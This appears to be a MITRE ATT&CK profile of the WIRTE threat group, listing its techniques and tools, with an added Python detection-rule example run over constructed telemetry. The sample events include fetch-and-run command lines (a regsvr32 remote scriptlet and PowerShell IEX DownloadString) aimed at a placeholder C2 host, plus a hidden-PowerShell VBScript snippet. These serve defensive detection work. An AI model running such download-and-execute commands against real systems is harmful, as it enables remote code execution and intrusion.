
G0090 WIRTE

WIRTE is a threat group that has been active since at least August 2018. WIRTE has targeted government, diplomatic, financial, military, legal, and technology organizations in the Middle East and Europe.[1][2]

ID: G0090
Associated Names: none listed
Version: 2.0
Created: 24 May 2019
Last Modified: 15 April 2022

Techniques Used

Domain | ID | Name | Use
Enterprise | T1071 | Application Layer Protocol | -
Enterprise | T1071.001 | Web Protocols | WIRTE has used HTTP for network communication.[1]
Enterprise | T1059 | Command and Scripting Interpreter | -
Enterprise | T1059.001 | PowerShell | WIRTE has used PowerShell for script execution.[1]
Enterprise | T1059.005 | Visual Basic | WIRTE has used VBScript in its operations.[1]
Enterprise | T1140 | Deobfuscate/Decode Files or Information | WIRTE has Base64-decoded a malicious VBS script.[1]
Enterprise | T1105 | Ingress Tool Transfer | WIRTE has downloaded PowerShell code from its C2 server for execution.[1]
Enterprise | T1036 | Masquerading | -
Enterprise | T1036.005 | Match Legitimate Name or Location | WIRTE has named a first-stage dropper "Kaspersky Update Agent" so that it appears legitimate.[2]
Enterprise | T1571 | Non-Standard Port | WIRTE has used HTTPS over ports 2083 and 2087 for C2 (the ports cPanel and WHM use for TLS management traffic, so the connections can pass as hosting administration).[2]
Enterprise | T1588 | Obtain Capabilities | -
Enterprise | T1588.002 | Tool | WIRTE has obtained and used Empire for post-exploitation activity.[1]
Enterprise | T1566 | Phishing | -
Enterprise | T1566.001 | Spearphishing Attachment | WIRTE has sent emails to intended victims with malicious MS Word and Excel attachments.[2]
Enterprise | T1218 | System Binary Proxy Execution | -
Enterprise | T1218.010 | Regsvr32 | WIRTE has used regsvr32.exe to trigger execution of a malicious script.[1]
Enterprise | T1204 | User Execution | -
Enterprise | T1204.002 | Malicious File | WIRTE has attempted to lure users into opening malicious MS Word and Excel files that execute malicious payloads.[2]
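The behaviours in the table above map directly onto detection logic. What follows is an added example, not code from the ATT&CK page or from WIRTE's tooling: a handful of rules run over constructed, Sysmon-like process, network and script events. Every field name, host name, file path, the cPanel-administrator allow-list and the Kaspersky signer string are assumptions of this example. TCP 2083 and 2087 are the standard cPanel and WHM TLS ports, so the port rule is scoped with an allow-list rather than alerting on every connection.

```python
"""Detection rules for the WIRTE behaviours tabulated above (added example,
not part of the ATT&CK page). Events are constructed inline in a simplified
Sysmon-like shape; field names, hosts, paths and the allow-list are assumed."""
import base64
import re
from dataclasses import dataclass

# 2083 (cPanel over TLS) and 2087 (WHM over TLS) carry legitimate hosting
# administration traffic, so the port rule only fires from hosts that are
# not on an (assumed) allow-list of cPanel administrators.
C2_PORTS = {2083, 2087}
CPANEL_ADMIN_HOSTS = {"hosting-admin-01"}  # assumed allow-list

# Signer string assumed for genuine Kaspersky binaries; check against your own PKI data.
KASPERSKY_SIGNER = "AO Kaspersky Lab"

REGSVR32_REMOTE_SCT = re.compile(r"/i:\S*(https?:|\\\\)", re.I)
PS_DOWNLOAD = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I)
PS_INVOKE = re.compile(r"\b(IEX|Invoke-Expression)\b", re.I)
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
VBS_MARKERS = re.compile(r"CreateObject\(|WScript\.Shell|Scripting\.FileSystemObject", re.I)


@dataclass(frozen=True)
class Finding:
    technique: str
    rule: str
    event_id: int


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev: dict) -> list[Finding]:
    out = []
    exe, cmd = _basename(ev.get("image", "")), ev.get("cmdline", "")
    # T1218.010: regsvr32 loading a scriptlet from a remote/UNC location or via scrobj.dll
    if exe == "regsvr32.exe" and (REGSVR32_REMOTE_SCT.search(cmd) or "scrobj.dll" in cmd.lower()):
        out.append(Finding("T1218.010", "regsvr32 scriptlet execution", ev["id"]))
    # T1105 / T1059.001: PowerShell fetching code from a remote host and running it in memory
    if exe in {"powershell.exe", "pwsh.exe"} and PS_DOWNLOAD.search(cmd):
        out.append(Finding("T1105", "PowerShell downloads remote content", ev["id"]))
        if PS_INVOKE.search(cmd):
            out.append(Finding("T1059.001", "downloaded content executed via IEX", ev["id"]))
    # T1036.005: a Kaspersky-named binary that Kaspersky did not sign
    if "kaspersky" in exe and ev.get("signer") != KASPERSKY_SIGNER:
        out.append(Finding("T1036.005", "Kaspersky-named binary without Kaspersky signature", ev["id"]))
    return out


def check_network(ev: dict) -> list[Finding]:
    # T1571: traffic to the cPanel/WHM TLS ports from a host that should never administer cPanel
    if ev.get("dst_port") in C2_PORTS and ev.get("host") not in CPANEL_ADMIN_HOSTS:
        return [Finding("T1571", f"outbound TCP/{ev['dst_port']} from non-admin host", ev["id"])]
    return []


def check_script(ev: dict) -> list[Finding]:
    # T1140: a script carrying a base64 blob that decodes to VBScript
    for blob in B64_BLOB.findall(ev.get("content", "")):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
        except ValueError:  # binascii.Error is a ValueError: bad alphabet or padding
            continue
        if VBS_MARKERS.search(decoded):
            return [Finding("T1140", "base64 blob decodes to VBScript", ev["id"])]
    return []


def run_rules(events: list[dict]) -> list[Finding]:
    dispatch = {"process": check_process, "network": check_network, "script": check_script}
    findings = []
    for ev in events:
        findings.extend(dispatch[ev["type"]](ev))
    return findings


# Constructed sample telemetry (not real). The VBS payload is encoded here so the blob decodes.
_VBS_B64 = base64.b64encode(b'Set sh = CreateObject("WScript.Shell"): sh.Run "powershell -nop -w hidden"').decode()
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "host": "ws-17", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:https://c2.example.invalid/a.sct scrobj.dll", "signer": "Microsoft Windows"},
    {"id": 2, "type": "process", "host": "ws-17", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://c2.example.invalid/s')\"",
     "signer": "Microsoft Windows"},
    {"id": 3, "type": "process", "host": "ws-17", "image": r"C:\Users\u\AppData\Local\Temp\Kaspersky Update Agent.exe",
     "cmdline": '"Kaspersky Update Agent.exe"', "signer": None},
    {"id": 4, "type": "process", "host": "ws-18", "image": r"C:\Program Files (x86)\Kaspersky Lab\kaspersky_updater.exe",
     "cmdline": "kaspersky_updater.exe", "signer": "AO Kaspersky Lab"},  # benign control case (assumed path)
    {"id": 5, "type": "process", "host": "ws-18", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\comp.dll", "signer": "Microsoft Windows"},
    {"id": 6, "type": "network", "host": "ws-17", "dst": "203.0.113.5", "dst_port": 2087},
    {"id": 7, "type": "network", "host": "hosting-admin-01", "dst": "203.0.113.9", "dst_port": 2083},
    {"id": 8, "type": "script", "host": "ws-17", "content": 'Dim p: p = "' + _VBS_B64 + '": Execute(Decode(p))'},
]

if __name__ == "__main__":
    for f in run_rules(SAMPLE_EVENTS):
        print(f"{f.technique:<10} event {f.event_id}: {f.rule}")
```

Events 4, 5 and 7 are the benign controls: a vendor-signed Kaspersky binary, a local regsvr32 registration with no /i: scriptlet, and a cPanel administrator reaching port 2083 produce no findings, while the remaining events each light up the technique from the table. In production the allow-list and signer checks would come from asset inventory and code-signing telemetry rather than constants.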

Software

ID | Name | References | Techniques
S0363 | Empire | [1] | Bypass User Account Control:Abuse Elevation Control Mechanism; Access Token Manipulation; SID-History Injection:Access Token Manipulation; Create Process with Token:Access Token Manipulation; Domain Account:Account Discovery; Local Account:Account Discovery; LLMNR/NBT-NS Poisoning and SMB Relay:Adversary-in-the-Middle; Web Protocols:Application Layer Protocol; Archive Collected Data; Automated Collection; Automated Exfiltration; Shortcut Modification:Boot or Logon Autostart Execution; Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution; Security Support Provider:Boot or Logon Autostart Execution; Browser Information Discovery; Clipboard Data; PowerShell:Command and Scripting Interpreter; Windows Command Shell:Command and Scripting Interpreter; Command and Scripting Interpreter; Domain Account:Create Account; Local Account:Create Account; Windows Service:Create or Modify System Process; Credentials from Web Browsers:Credentials from Password Stores; Group Policy Modification:Domain Policy Modification; Domain Trust Discovery; Local Email Collection:Email Collection; Asymmetric Cryptography:Encrypted Channel; Accessibility Features:Event Triggered Execution; Exfiltration Over C2 Channel; Exfiltration to Code Repository:Exfiltration Over Web Service; Exfiltration to Cloud Storage:Exfiltration Over Web Service; Exploitation for Privilege Escalation; Exploitation of Remote Services; File and Directory Discovery; Group Policy Discovery; Path Interception by Search Order Hijacking:Hijack Execution Flow; Dylib Hijacking:Hijack Execution Flow; Path Interception by Unquoted Path:Hijack Execution Flow; DLL Search Order Hijacking:Hijack Execution Flow; Path Interception by PATH Environment Variable:Hijack Execution Flow; Timestomp:Indicator Removal; Ingress Tool Transfer; Keylogging:Input Capture; Credential API Hooking:Input Capture; Native API; Network Service Discovery; Network Share Discovery; Network Sniffing; Command Obfuscation:Obfuscated Files or Information; LSASS Memory:OS Credential Dumping; Process Discovery; Process Injection; Distributed Component Object Model:Remote Services; SSH:Remote Services; Scheduled Task:Scheduled Task/Job; Screen Capture; Security Software Discovery:Software Discovery; Kerberoasting:Steal or Forge Kerberos Tickets; Silver Ticket:Steal or Forge Kerberos Tickets; Golden Ticket:Steal or Forge Kerberos Tickets; System Information Discovery; System Network Configuration Discovery; System Network Connections Discovery; System Owner/User Discovery; Service Execution:System Services; MSBuild:Trusted Developer Utilities Proxy Execution; Credentials In Files:Unsecured Credentials; Private Keys:Unsecured Credentials; Pass the Hash:Use Alternate Authentication Material; Video Capture; Bidirectional Communication:Web Service; Windows Management Instrumentation
S0679 | Ferocious | [2] | Visual Basic:Command and Scripting Interpreter; PowerShell:Command and Scripting Interpreter; Component Object Model Hijacking:Event Triggered Execution; File Deletion:Indicator Removal; Modify Registry; Peripheral Device Discovery; Security Software Discovery:Software Discovery; System Information Discovery; System Checks:Virtualization/Sandbox Evasion
S0680 | LitePower | [2] | Web Protocols:Application Layer Protocol; PowerShell:Command and Scripting Interpreter; Exfiltration Over C2 Channel; Ingress Tool Transfer; Native API; Query Registry; Scheduled Task:Scheduled Task/Job; Screen Capture; Security Software Discovery:Software Discovery; System Information Discovery; System Owner/User Discovery

References